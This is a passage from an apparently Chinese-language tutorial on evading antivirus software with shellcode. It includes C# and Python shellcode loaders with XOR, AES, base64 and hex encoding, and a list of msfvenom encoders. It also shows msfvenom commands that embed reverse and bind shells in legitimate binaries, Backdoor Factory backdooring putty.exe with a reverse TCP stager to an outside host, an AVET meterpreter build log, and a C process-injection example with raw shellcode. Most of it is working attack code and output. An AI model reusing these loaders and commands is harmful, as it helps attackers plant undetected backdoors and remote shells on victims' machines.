class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">xa8</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span><span class="p">,</span><span class="m">0</span><span class="n">xea</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">x5f</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x51</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x61</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">xd5</span><span class="p">,</span><span class="m">0</span><span class="n">x3a</span><span class="p">,</span><span class="m">0</span><span class="n">x8b</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span class="p">,</span><span class="m">0</span><span class="n">x0d</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span class="p">,</span><span class="m">0</span><span class="n">x30</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x6b</span><span class="p">,</span><span class="m">0</span><span class="n">xb7</span><span class="p">,</span><span class="m">0</span><span class="n">xaf</span><span class="p">,</span><span class="m">0</span><span class="n">x2e</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">xbb</span><span class="p">,</span><span class="m">0</span><span class="n">xe4</span><span class="p">,</span><span class="m">0</span><span class="n">x89</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x13</span><span class="p">,</span><span class="m">0</span><span class="n">x4f</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x27</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x04</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">x48</span><span class="p">,</span><span class="m">0</span><span class="n">x7e</span><span class="p">,</span><span class="m">0</span><span class="n">x59</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">xb2</span><span class="p">,</span><span class="m">0</span><span class="n">x26</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x09</span><span class="p">,</span><span class="m">0</span><span class="n">x3c</span><span class="p">,</span><span class="m">0</span><span class="n">x08</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">xb2</span><span class="p">,</span><span class="m">0</span><span class="n">x2f</span><span class="p">,</span><span class="m">0</span><span class="n">x37</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x6b</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xeb</span><span class="p">,</span><span class="m">0</span><span class="n">x17</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">xea</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">x70</span><span class="p">,</span><span class="m">0</span><span class="n">xaa</span><span class="p">,</span><span class="m">0</span><span class="n">x47</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">x04</span><span class="p">,</span><span class="m">0</span><span class="n">xa8</span><span class="p">,</span><span class="m">0</span><span class="n">xad</span><span class="p">,</span><span class="m">0</span><span class="n">xdc</span><span class="p">,</span><span class="m">0</span><span class="n">x81</span><span class="p">,</span><span class="m">0</span><span class="n">xdc</span><span class="p">,</span><span class="m">0</span><span class="n">xcc</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span> <span class="p">};</span>
<span class="kt">string</span> <span class="n">key</span> <span class="p">=</span> <span class="s">"qing"</span><span class="p">;</span>
<span class="kt">string</span> <span class="n">cipherType</span> <span class="p">=</span> <span class="s">"xor"</span><span class="p">;</span>
<span class="kt">byte</span><span class="p">[]</span> <span class="n">shellcode</span> <span class="p">=</span> <span class="k">null</span><span class="p">;</span>
<span class="c1">//--------------------------------------------------------------</span>
<span class="c1">// Decrypt the shellcode</span>
<span class="k">if</span> <span class="p">(</span><span class="n">cipherType</span> <span class="p">==</span> <span class="s">"xor"</span><span class="p">)</span> <span class="p">{</span>
<span class="n">shellcode</span> <span class="p">=</span> <span class="n">xor</span><span class="p">(</span><span class="n">encryptedShellcode</span><span class="p">,</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">key</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">else</span> <span class="nf">if</span> <span class="p">(</span><span class="n">cipherType</span> <span class="p">==</span> <span class="s">"aes"</span><span class="p">)</span> <span class="p">{</span>
<span class="n">shellcode</span> <span class="p">=</span> <span class="n">aesDecrypt</span><span class="p">(</span><span class="n">encryptedShellcode</span><span class="p">,</span> <span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">key</span><span class="p">));</span>
<span class="p">}</span>
<span class="c1">//-------------------------------------------------------------- </span>
<span class="c1">// Copy decrypted shellcode to memory</span>
<span class="n">UInt32</span> <span class="n">funcAddr</span> <span class="p">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="p">(</span><span class="n">UInt32</span><span class="p">)</span><span class="n">shellcode</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">Marshal</span><span class="p">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">shellcode</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="p">(</span><span class="n">IntPtr</span><span class="p">)(</span><span class="n">funcAddr</span><span class="p">),</span> <span class="n">shellcode</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span>
<span class="n">IntPtr</span> <span class="n">hThread</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
<span class="n">UInt32</span> <span class="n">threadId</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span>
<span class="c1">// Prepare data</span>
<span class="n">IntPtr</span> <span class="n">pinfo</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
<span class="c1">// Invoke the shellcode</span>
<span class="n">hThread</span> <span class="p">=</span> <span class="n">CreateThread</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">funcAddr</span><span class="p">,</span> <span class="n">pinfo</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="k">ref</span> <span class="n">threadId</span><span class="p">);</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">hThread</span><span class="p">,</span> <span class="m">0</span><span class="n">xFFFFFFFF</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">private</span> <span class="k">static</span> <span class="n">UInt32</span> <span class="n">MEM_COMMIT</span> <span class="p">=</span> <span class="m">0</span><span class="n">x1000</span><span class="p">;</span>
<span class="k">private</span> <span class="k">static</span> <span class="n">UInt32</span> <span class="n">PAGE_EXECUTE_READWRITE</span> <span class="p">=</span> <span class="m">0</span><span class="n">x40</span><span class="p">;</span>
<span class="c1">// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject</span>
[DllImport(“kernel32”)]
private static extern UInt32 VirtualAlloc(
UInt32 lpStartAddr,
UInt32 size,
UInt32 flAllocationType,
UInt32 flProtect
);
[DllImport(“kernel32”)]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport(“kernel32”)]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
其他语言也是一样,比如py 异或编码、base64、十六进制这些都是可以的
py Base64
(k8gege):
import ctypes
import sys
import base64
#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
shellcode=bytearray(base64.b64decode(sys.argv[1]).decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
py 十六进制:
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
shellcode=bytearray(sys.argv[1].decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
shellcode_encoder
还有一款编码的工具也好用,安利一下:
https://github.com/ecx86/shellcode_encoder
那么这是利用语言对shellcode编码,也可以选择生成的时候对shellcode编码。
举例msfvenom:
kali@kali:~$ msfvenom -l encoder
Framework Encoders [–encoder <value>]
======================================
<span class="n">Name</span> <span class="n">Rank</span> <span class="n">Description</span>
<span class="o">----</span> <span class="o">----</span> <span class="o">-----------</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">brace</span> <span class="n">low</span> <span class="n">Bash</span> <span class="n">Brace</span> <span class="n">Expansion</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">echo</span> <span class="n">good</span> <span class="n">Echo</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">generic_sh</span> <span class="n">manual</span> <span class="n">Generic</span> <span class="n">Shell</span> <span class="n">Variable</span> <span class="n">Substitution</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">ifs</span> <span class="n">low</span> <span class="n">Bourne</span> <span class="err">$</span><span class="p">{</span><span class="n">IFS</span><span class="p">}</span> <span class="n">Substitution</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">perl</span> <span class="n">normal</span> <span class="n">Perl</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">powershell_base64</span> <span class="n">excellent</span> <span class="n">Powershell</span> <span class="n">Base64</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">printf_php_mq</span> <span class="n">manual</span> <span class="n">printf</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">via</span> <span class="n">PHP</span> <span class="n">magic_quotes</span> <span class="n">Utility</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">generic</span><span class="o">/</span><span class="n">eicar</span> <span class="n">manual</span> <span class="n">The</span> <span class="n">EICAR</span> <span class="n">Encoder</span>
<span class="n">generic</span><span class="o">/</span><span class="n">none</span> <span class="n">normal</span> <span class="n">The</span> <span class="s2">"none"</span> <span class="n">Encoder</span>
<span class="n">mipsbe</span><span class="o">/</span><span class="n">byte_xori</span> <span class="n">normal</span> <span class="n">Byte</span> <span class="n">XORi</span> <span class="n">Encoder</span>
<span class="n">mipsbe</span><span class="o">/</span><span class="n">longxor</span> <span class="n">normal</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">mipsle</span><span class="o">/</span><span class="n">byte_xori</span> <span class="n">normal</span> <span class="n">Byte</span> <span class="n">XORi</span> <span class="n">Encoder</span>
<span class="n">mipsle</span><span class="o">/</span><span class="n">longxor</span> <span class="n">normal</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">php</span><span class="o">/</span><span class="n">base64</span> <span class="n">great</span> <span class="n">PHP</span> <span class="n">Base64</span> <span class="n">Encoder</span>
<span class="n">ppc</span><span class="o">/</span><span class="n">longxor</span> <span class="n">normal</span> <span class="n">PPC</span> <span class="n">LongXOR</span> <span class="n">Encoder</span>
<span class="n">ppc</span><span class="o">/</span><span class="n">longxor_tag</span> <span class="n">normal</span> <span class="n">PPC</span> <span class="n">LongXOR</span> <span class="n">Encoder</span>
<span class="n">ruby</span><span class="o">/</span><span class="n">base64</span> <span class="n">great</span> <span class="n">Ruby</span> <span class="n">Base64</span> <span class="n">Encoder</span>
<span class="n">sparc</span><span class="o">/</span><span class="n">longxor_tag</span> <span class="n">normal</span> <span class="n">SPARC</span> <span class="n">DWORD</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">xor</span> <span class="n">normal</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">xor_context</span> <span class="n">normal</span> <span class="n">Hostname</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">xor_dynamic</span> <span class="n">normal</span> <span class="n">Dynamic</span> <span class="n">key</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">zutto_dekiru</span> <span class="n">manual</span> <span class="n">Zutto</span> <span class="n">Dekiru</span>
<span class="n">x86</span><span class="o">/</span><span class="n">add_sub</span> <span class="n">manual</span> <span class="n">Add</span><span class="o">/</span><span class="n">Sub</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">alpha_mixed</span> <span class="n">low</span> <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Mixedcase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">alpha_upper</span> <span class="n">low</span> <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Uppercase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">avoid_underscore_tolower</span> <span class="n">manual</span> <span class="n">Avoid</span> <span class="n">underscore</span><span class="o">/</span><span class="n">tolower</span>
<span class="n">x86</span><span class="o">/</span><span class="n">avoid_utf8_tolower</span> <span class="n">manual</span> <span class="n">Avoid</span> <span class="n">UTF8</span><span class="o">/</span><span class="n">tolower</span>
<span class="n">x86</span><span class="o">/</span><span class="n">bloxor</span> <span class="n">manual</span> <span class="n">BloXor</span> <span class="o">-</span> <span class="n">A</span> <span class="n">Metamorphic</span> <span class="n">Block</span> <span class="n">Based</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">bmp_polyglot</span> <span class="n">manual</span> <span class="n">BMP</span> <span class="n">Polyglot</span>
<span class="n">x86</span><span class="o">/</span><span class="n">call4_dword_xor</span> <span class="n">normal</span> <span class="n">Call</span><span class="o">+</span><span class="mi">4</span> <span class="n">Dword</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">context_cpuid</span> <span class="n">manual</span> <span class="n">CPUID</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">context_stat</span> <span class="n">manual</span> <span class="n">stat</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">context_time</span> <span class="n">manual</span> <span class="n">time</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">countdown</span> <span class="n">normal</span> <span class="n">Single</span><span class="o">-</span><span class="n">byte</span> <span class="n">XOR</span> <span class="n">Countdown</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">fnstenv_mov</span> <span class="n">normal</span> <span class="n">Variable</span><span class="o">-</span><span class="n">length</span> <span class="n">Fnstenv</span><span class="o">/</span><span class="n">mov</span> <span class="n">Dword</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">jmp_call_additive</span> <span class="n">normal</span> <span class="n">Jump</span><span class="o">/</span><span class="n">Call</span> <span class="n">XOR</span> <span class="n">Additive</span> <span class="n">Feedback</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">nonalpha</span> <span class="n">low</span> <span class="n">Non</span><span class="o">-</span><span class="n">Alpha</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">nonupper</span> <span class="n">low</span> <span class="n">Non</span><span class="o">-</span><span class="n">Upper</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">opt_sub</span> <span class="n">manual</span> <span class="n">Sub</span> <span class="n">Encoder</span> <span class="p">(</span><span class="n">optimised</span><span class="p">)</span>
<span class="n">x86</span><span class="o">/</span><span class="n">service</span> <span class="n">manual</span> <span class="n">Register</span> <span class="n">Service</span>
<span class="n">x86</span><span class="o">/</span><span class="n">shikata_ga_nai</span> <span class="n">excellent</span> <span class="n">Polymorphic</span> <span class="n">XOR</span> <span class="n">Additive</span> <span class="n">Feedback</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">single_static_bit</span> <span class="n">manual</span> <span class="n">Single</span> <span class="n">Static</span> <span class="n">Bit</span>
<span class="n">x86</span><span class="o">/</span><span class="n">unicode_mixed</span> <span class="n">manual</span> <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Unicode</span> <span class="n">Mixedcase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">unicode_upper</span> <span class="n">manual</span> <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Unicode</span> <span class="n">Uppercase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">xor_dynamic</span> <span class="n">normal</span> <span class="n">Dynamic</span> <span class="n">key</span> <span class="n">XOR</span> <span class="n">Encoder</span>
使用模板和编码器
for example:
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe
msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 -platform win -f exe > b.exe
Veil中的加密:
schelper:
Obfuscation:
Invoke-Obfuscation -ScriptBlock {echo xss} -Command 'Encoding\1,Launcher\PS\67' -Quiet
关于shellcode编码后执行就点到这里,其他语言也是大同小异,就不多列举了。
上面是一些编码加密shellcode,下面就看看shellcode注入的技巧方式。
B)shellcode注入混淆
大多数注入免杀还将shellcode进行了拆分。
拆分这两个字也很好理解,字面的意思上和各位php一句话木马免杀中大体一样,shellcode也好比我们php木马中需要拆分的危险函数名。
shellcode拆分可以把原本特征明显的程序中shellcode进行位置替换,最简单的比如新增加区段填入shellcode并将入口点jmp到shellcode地址最后再跳回原程序开头,
也可以将shellcode分段布在各个code cave中再分段执行,原理可以参考egg hunt shellcode的中的Omelet Shellcode。
举一些注入例子:
BDF:
https://github.com/secretsquirrel/the-backdoor-factory
*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 410
[*] All caves lengths: 410
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 410
[*] Available caves:
1. Section Name: DATA; Section Begin: 0x5df200 End: 0x665400; Cave begin: 0x65ea07 End: 0x65ec68; Cave Size: 609
3. Section Name: .rdata; Section Begin: 0x66a000 End: 0x66a200; Cave begin: 0x66a013 End: 0x66a200; Cave Size: 493
4. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8203f End: 0xc82308; Cave Size: 713
5. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc82e1c End: 0xc83050; Cave Size: 564
6. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc830eb End: 0xc83718; Cave Size: 1581
7. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc83b64 End: 0xc840fc; Cave Size: 1432
8. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc843ff End: 0xc846c8; Cave Size: 713
9. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc851dc End: 0xc85410; Cave Size: 564
10. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc854ab End: 0xc859d0; Cave Size: 1317
11. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86557 End: 0xc86b84; Cave Size: 1581
12. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86fd0 End: 0xc87568; Cave Size: 1432
13. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8760a End: 0xc87a32; Cave Size: 1064
14. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc886af End: 0xc88d58; Cave Size: 1705
15. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8b8b3 End: 0xc8bdd8; Cave Size: 1317
16. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8eaba End: 0xc8ed65; Cave Size: 683
BDF中-F参数实现多裂缝注入。
backdoor-factory -f putty.exe -s show
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444
shellter:
A 选项增加区段注入
Avet:
root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh
lhost=192.168.174.134
root@kali:/tmp/avet/build# cd …
root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function ‘main’:
avet.c:122:15: error: ‘buf’ undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in
正常进程注入shellcode
除了也可以手动整个进程注入,起一个正常进程注入shellcode
例子:
#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include "iostream"
using namespace std;
unsigned char shellcode[] =
"\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39"
"\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6"
"\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06"
"\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61"
"\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78"
"\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17"
"\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c"
"\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b"
"\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e"
"\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a"
"\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8"
"\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee"
"\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03"
"\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e"
